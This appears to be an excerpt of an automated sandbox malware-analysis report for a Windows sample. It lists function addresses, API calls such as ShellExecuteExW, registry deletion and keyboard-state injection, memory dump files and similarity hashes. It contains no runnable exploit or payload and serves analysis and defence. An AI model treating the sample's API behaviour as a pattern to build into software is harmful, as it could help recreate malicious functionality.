                                                                                                                                                                                      • _memmove.LIBCMT ref: 0094A28C
                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0094A29B
                                                                                                                                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0094A2B0
                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0094A2CF
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 256516436-0
                                                                                                                                                                                      • Opcode ID: a1eee53638ee47ef0a3e1b5f5b58ef176c95ff11d04c2fa302ec61e6361bff5e
                                                                                                                                                                                      • Instruction ID: f3ddced81d82f65302d84fafee42167f51e7af8ef747f29319640a4db5dd5ce0
                                                                                                                                                                                      • Opcode Fuzzy Hash: a1eee53638ee47ef0a3e1b5f5b58ef176c95ff11d04c2fa302ec61e6361bff5e
                                                                                                                                                                                      • Instruction Fuzzy Hash: B4317231A04105EBCB00EF94DC85EAEB7B9EF85310B1480A5F904AB296D774DD54DB61
                                                                                                                                                                                      Function 00968CDB Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00968CF3
                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00968CFB
                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00968D06
                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00968D12
                                                                                                                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00968D4E
                                                                                                                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00968D5F
                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0096BB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00968D99
                                                                                                                                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00968DB9
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3864802216-0
                                                                                                                                                                                      • Opcode ID: 9b480c562b3c81d052baea36ac648e8b7864b006580d208daf226c5bf5062ffc
                                                                                                                                                                                      • Instruction ID: 152cd58ff4c3c93c31309d17f7e619db9071bee0d234d015a6700127e5d1af78
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b480c562b3c81d052baea36ac648e8b7864b006580d208daf226c5bf5062ffc
                                                                                                                                                                                      • Instruction Fuzzy Hash: F2317A72205214BBEB108F51CC8AFEB3BADEF49755F044155FE08DA2D1DAB59841DBB0
                                                                                                                                                                                      Function 00951BFA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 308COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 009084A6: __swprintf.LIBCMT ref: 009084E5
                                                                                                                                                                                        • Part of subcall function 009084A6: __itow.LIBCMT ref: 00908519
                                                                                                                                                                                        • Part of subcall function 00903BCF: _wcscpy.LIBCMT ref: 00903BF2
                                                                                                                                                                                      • _wcstok.LIBCMT ref: 00951D6E
                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00951DFD
                                                                                                                                                                                      • _memset.LIBCMT ref: 00951E30
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                                                                      • String ID: X
                                                                                                                                                                                      • API String ID: 774024439-3081909835
                                                                                                                                                                                      • Opcode ID: 4fb73975a35922dd3b7e08c6104cde23d38ed457f5b0462ca89bb8f032c39cf9
                                                                                                                                                                                      • Instruction ID: 4d5f7a8ebc46e64680d8ca986acfc95c4fb1b57da68b00c6f58ca9e081365a15
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4fb73975a35922dd3b7e08c6104cde23d38ed457f5b0462ca89bb8f032c39cf9
                                                                                                                                                                                      • Instruction Fuzzy Hash: A1C14C756083119FC714EF24C881B9AB7E4FF85310F14492DF99A9B2A2DB70ED49CB92
                                                                                                                                                                                      Function 0091B40F Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 867791b9104e50f59da35c50eaaf4bff8502cdc2f3e319a3543d7f8d433edd30
                                                                                                                                                                                      • Instruction ID: ce4ffdd12ad2b22fee8270666a7b2cb35b09adc68c7defe7de38dbdbf71c10fd
                                                                                                                                                                                      • Opcode Fuzzy Hash: 867791b9104e50f59da35c50eaaf4bff8502cdc2f3e319a3543d7f8d433edd30
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D715D71A04109EFDB04CF99CC45AFEBB7AFF89314F14C159F915AA291C7349A41DB60
                                                                                                                                                                                      Function 00962121 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _memset.LIBCMT ref: 0096214B
                                                                                                                                                                                      • _memset.LIBCMT ref: 00962214
                                                                                                                                                                                      • ShellExecuteExW.SHELL32(?), ref: 00962259
                                                                                                                                                                                        • Part of subcall function 009084A6: __swprintf.LIBCMT ref: 009084E5
                                                                                                                                                                                        • Part of subcall function 009084A6: __itow.LIBCMT ref: 00908519
                                                                                                                                                                                        • Part of subcall function 00903BCF: _wcscpy.LIBCMT ref: 00903BF2
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00962320
                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 0096232F
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                      • API String ID: 4082843840-2766056989
                                                                                                                                                                                      • Opcode ID: 9505f123a74e45599528a3d04021a35d1553d9277fd26027a2cd3754d5030f51
                                                                                                                                                                                      • Instruction ID: 2668006e296bfe0bd736be96e66bb50d030decb7a0eeb08bac13839a1e92b61c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9505f123a74e45599528a3d04021a35d1553d9277fd26027a2cd3754d5030f51
                                                                                                                                                                                      • Instruction Fuzzy Hash: 01718D75A00619DFCF04EFA4C995AAEB7F5FF88310F118459E856AB3A1DB34AD40CB90
                                                                                                                                                                                      Function 009447DE Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetParent.USER32(?), ref: 0094481D
                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 00944832
                                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 00944893
                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 009448C1
                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 009448E0
                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00944926
                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00944949
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 87235514-0
                                                                                                                                                                                      • Opcode ID: e0ed3238709399f8339905eab873eed43ff120607f19ccb39b0ddeae7cb233af
                                                                                                                                                                                      • Instruction ID: 8d09be372e9ecbab321bec7bd3f913b3c5443ec04724ddfb2ea23f7403418245
                                                                                                                                                                                      • Opcode Fuzzy Hash: e0ed3238709399f8339905eab873eed43ff120607f19ccb39b0ddeae7cb233af
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5351D2A06187D53DFB3642348C45FBBBFAD6F06704F088989E1D5569C2C6E8EC88E750
                                                                                                                                                                                      Function 009445F9 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetParent.USER32(00000000), ref: 00944638
                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 0094464D
                                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 009446AE
                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 009446DA
                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 009446F7
                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0094473B
                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0094475C
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 87235514-0
                                                                                                                                                                                      • Opcode ID: b95dd03e4cf97ac8ca6fc67f29fdc3440991bd9aaed8ed08a05a42b4c0707645
                                                                                                                                                                                      • Instruction ID: 35fcd88a38961bde960ca9947b259da2437785deb5f2b5e07566570cae6c3abe
                                                                                                                                                                                      • Opcode Fuzzy Hash: b95dd03e4cf97ac8ca6fc67f29fdc3440991bd9aaed8ed08a05a42b4c0707645
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A51E5B05147D63DFB3687248C45F7ABFADAB07304F088589E1D5568C2D394EC99EB50
                                                                                                                                                                                      Function 009486AE Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _wcsncpy$LocalTime
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2945705084-0
                                                                                                                                                                                      • Opcode ID: 7f1c2f3f0b2d36cbc7865aa8c24a50a3a83c91ec89fec00669197c4c3d72dabf
                                                                                                                                                                                      • Instruction ID: 88fba7fc592cc36d3842f0efb8072c155e2993495d34abc1c66135fc3d95d19c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7f1c2f3f0b2d36cbc7865aa8c24a50a3a83c91ec89fec00669197c4c3d72dabf
                                                                                                                                                                                      • Instruction Fuzzy Hash: 71414F65C10224B5CF10EBF4DC86ACFB7BCAF45310F908866E564F3225EA30E665C7A5
                                                                                                                                                                                      Function 00969D97 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _memset.LIBCMT ref: 00969DB0
                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00969E57
                                                                                                                                                                                      • IsMenu.USER32(?), ref: 00969E6F
                                                                                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00969EB7
                                                                                                                                                                                      • DrawMenuBar.USER32 ref: 00969ED0
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                      • API String ID: 3866635326-4108050209
                                                                                                                                                                                      • Opcode ID: 7f6b6a0e74694c9acaf7721d0a28e506af2043d7da3c160121d08d2949b9e134
                                                                                                                                                                                      • Instruction ID: e396fade82cc2f049a0295b446f5dedc5b835b5609d991720b189c399625e023
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7f6b6a0e74694c9acaf7721d0a28e506af2043d7da3c160121d08d2949b9e134
                                                                                                                                                                                      • Instruction Fuzzy Hash: DF412675A00209EFDB21DF54D884E9ABBF8FF0A364F04842AF90597251D731ED54DB60
                                                                                                                                                                                      Function 00963C63 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00963C92
                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00963CBC
                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00963D71
                                                                                                                                                                                        • Part of subcall function 00963C63: RegCloseKey.ADVAPI32(?), ref: 00963CD9
                                                                                                                                                                                        • Part of subcall function 00963C63: FreeLibrary.KERNEL32(?), ref: 00963D2B
                                                                                                                                                                                        • Part of subcall function 00963C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00963D4E
                                                                                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00963D16
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 395352322-0
                                                                                                                                                                                      • Opcode ID: 138e7a405a2630d05f5c8b4eebffbd426c8abbda3b6b91c2e59b25896143ecbf
                                                                                                                                                                                      • Instruction ID: 53d3ef8d9ff123738a8d92f81f211e3d5a1eb15050964269fc15164a6c072cc6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 138e7a405a2630d05f5c8b4eebffbd426c8abbda3b6b91c2e59b25896143ecbf
                                                                                                                                                                                      • Instruction Fuzzy Hash: 48314C71911209BFDB159F94DC99EFFB7BCEF09300F10856AE512E2290D6749F489B60
                                                                                                                                                                                      Function 00968DD5 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00968DF4
                                                                                                                                                                                      • GetWindowLongW.USER32(0139F2C8,000000F0), ref: 00968E27
                                                                                                                                                                                      • GetWindowLongW.USER32(0139F2C8,000000F0), ref: 00968E5C
                                                                                                                                                                                      • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00968E8E
                                                                                                                                                                                      • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00968EB8
                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00968EC9
                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00968EE3
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: LongWindow$MessageSend
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2178440468-0
                                                                                                                                                                                      • Opcode ID: b1e4ac08ff4af8e742eaa791db35f988a4187826da9aa081319001a5c2865fec
                                                                                                                                                                                      • Instruction ID: 2ae5cce0b82330ca98488659d3e68a7a09dbaf609ea9e6e50b1d6d851f4c1f38
                                                                                                                                                                                      • Opcode Fuzzy Hash: b1e4ac08ff4af8e742eaa791db35f988a4187826da9aa081319001a5c2865fec
                                                                                                                                                                                      • Instruction Fuzzy Hash: BB312431658214EFEB22EF58DC88F5637E9FB4A754F1542A5F5058B2B2CB72AC40EB40
                                                                                                                                                                                      Function 009416F1 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00941734
                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0094175A
                                                                                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 0094175D
                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 0094177B
                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00941784
                                                                                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 009417A9
                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 009417B7
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3761583154-0
                                                                                                                                                                                      • Opcode ID: bdd5a608fccbfd0581c5547d5eed98ae391eabb0e7eedff7918a8dc4020b23a9
                                                                                                                                                                                      • Instruction ID: c40e2667ea5896ee08797b8ba9eea7299b735724be81c0fee1f4c67605f06cae
                                                                                                                                                                                      • Opcode Fuzzy Hash: bdd5a608fccbfd0581c5547d5eed98ae391eabb0e7eedff7918a8dc4020b23a9
                                                                                                                                                                                      • Instruction Fuzzy Hash: 47219275605219AFDB10ABB8CC88CBF73ECEB09374B408525F905DB2A1D774EC819760
                                                                                                                                                                                      Function 009469F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93filestringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 009031B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 009031DA
                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00946A2B
                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00946A49
                                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00946A62
                                                                                                                                                                                        • Part of subcall function 00946D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00946DBA
                                                                                                                                                                                        • Part of subcall function 00946D6D: GetLastError.KERNEL32 ref: 00946DC5
                                                                                                                                                                                        • Part of subcall function 00946D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00946DD9
                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00946AA4
                                                                                                                                                                                      • SHFileOperationW.SHELL32(?), ref: 00946B0C
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
